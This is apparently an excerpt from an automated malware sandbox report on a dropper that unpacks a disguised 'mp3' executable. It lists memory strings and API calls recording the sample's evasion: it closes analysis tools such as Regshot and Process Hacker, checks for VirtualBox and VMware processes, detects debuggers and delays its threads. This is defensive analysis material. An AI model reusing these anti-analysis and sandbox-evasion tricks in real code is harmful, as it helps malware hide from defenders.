                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: REGSHOT.EXEZ2
                Source: qwlvpmrupf.mp3, 00000007.00000003.1947833274.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951093785.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1953739155.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")F
                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: REGSHOT.EXES
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ERE.EXEFIDDLER.EXEIDA.EX
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCMON.EXE
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: REGSHOT.EXES2
                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXE-
                Source: qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: REGSHOT.EXES7
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")Z
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000008255000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FIDDLER.EXE
                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: REGSHOT.EXEA
                Source: qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078498674.0000000001763000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")O
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENJ
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: REGSHOT.EXE
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079472285.0000000001766000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076669694.0000000001765000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")+
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Check user administrative privileges: GetTokenInformation
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 API coverage: 5.7 %
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe API coverage: 5.4 %
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 68 > 30
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 191 > 30
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 94 > 30
                Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B0F826
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00B21630
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_003DE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003E9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003EA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_003EA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_003E65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E7248 FindFirstFileW,FindClose,7_2_003E7248
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_003E72E9
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00DFE387
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFD836
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFDB69
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E09F9F
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E0A0FA
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00E0A488
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00E065F1
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00E072E9
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E07248 FindFirstFileW,FindClose,16_2_00E07248
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B24E14 VirtualQuery,GetSystemInfo,0_2_00B24E14
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: qwlvpmrupf.mp3.exe, 00000012.00000002.2217353768.0000000001957000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exeT=
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe5FB536C7
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Thenv
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe(
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then_$
                Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: OpenWith.exe, 0000000F.00000002.2945020852.0000000003528000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2945020852.00000000035A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe59767-q*
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296872419.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296756734.0000000001398000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then30|q
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001787000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076454608.000000000178D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076887703.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077612652.000000000179F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exev
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078297593.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079283835.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077795230.000000000173F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077763537.0000000001737000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Thensw
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215199995.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe|
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThengC
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe3A765687Iq
                Source: qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThenQy
                Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951848484.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952934549.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") ThenP*&
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21"
                Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then`y
                Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948427869.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950258431.00000000010B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenVy
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296155124.00000000013FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe7>
                Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe API call chain: ExitProcess graph end node graph_0-27815
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF3FF BlockInput,7_2_003EF3FF
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B26878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00375D78
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2ECAA mov eax, dword ptr fs:[00000030h] 0_2_00B2ECAA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00395078 mov eax, dword ptr fs:[00000030h] 7_2_00395078
